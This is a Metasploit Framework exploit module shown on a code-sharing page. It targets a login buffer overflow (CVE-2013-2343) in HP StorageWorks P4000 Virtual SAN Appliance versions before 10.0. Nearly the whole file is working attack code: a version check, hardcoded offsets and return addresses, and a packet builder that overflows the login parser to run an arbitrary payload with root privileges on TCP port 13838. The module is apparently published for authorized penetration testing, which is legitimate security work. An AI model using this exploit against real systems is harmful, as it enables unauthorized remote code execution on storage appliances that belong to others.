Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
16
'Description' => %q{
17
This module exploits a buffer overflow vulnerability found in HP's StorageWorks
18
P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
19
of the sscanf() function when parsing login requests. This module has been tested
20
successfully on the HP VSA 9 Virtual Appliance.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
25
'juan vazquez' # Metasploit module
26
],
27
'References' => [
28
['CVE', '2013-2343'],
29
['OSVDB', '94701'],
30
['ZDI', '13-179'],
31
['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
32
],
33
'Payload' => {
34
'BadChars' => "\x2f\x00\x0d\x0a",
35
'Space' => 780,
36
'DisableNops' => true,
37
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
38
},
39
'DefaultOptions' => {
40
'EXITFUNC' => 'thread'
41
},
42
'Platform' => ['linux'],
43
'Arch' => ARCH_X86,
44
'Targets' => [
45
[
46
'HP VSA 9',
47
{
48
'Version' => '9.0.0',
49
'Offset' => 3446,
50
'Ret' => 0x0804EB34, # pop ebp # ret # from hydra
51
'FakeObject' => 0x08072E58, # from hydra data
52
'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra
53
}
54
]
55
],
56
'Privileged' => true,
57
'DisclosureDate' => '2013-06-28',
58
'DefaultTarget' => 0,
59
'Notes' => {
60
'Reliability' => UNKNOWN_RELIABILITY,
61
'Stability' => UNKNOWN_STABILITY,
62
'SideEffects' => UNKNOWN_SIDE_EFFECTS
63
}
64
)
65
)
66
67
register_options(
68
[
69
OptPort.new('RPORT', [true, 'The remote port', 13838])
70
]
71
)
72
end
73
74
def check
75
connect
76
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
77
vprint_status("#{rhost}:#{rport} Sending login packet to check...")
78
sock.put(packet)
79
res = sock.get_once
80
disconnect
81
82
if res and res =~ /OK/ and res =~ /Login/
83
return Exploit::CheckCode::Appears
84
elsif res and res =~ /FAILED/ and res =~ /version/
85
return Exploit::CheckCode::Detected
86
end
87
88
return Exploit::CheckCode::Safe
89
end
90
91
def generate_packet(data)
92
pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
93
pkt << [data.length + 1].pack("N*")
94
pkt << "\x00\x00\x00\x00"
95
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
96
pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
97
pkt << data
98
pkt << "\x00"
99
100
pkt
101
end
102
103
def exploit
104
connect
105
print_status("#{rhost}:#{rport} Sending login packet")
106
my_bof = rand_text(target['Offset'])
107
my_bof << [target.ret].pack("V")
108
my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
109
my_bof << [target['JmpEsp']].pack("V")
110
my_bof << payload.encoded
111
112
packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
113
sock.put(packet)
114
disconnect
115
end
116
end
117
118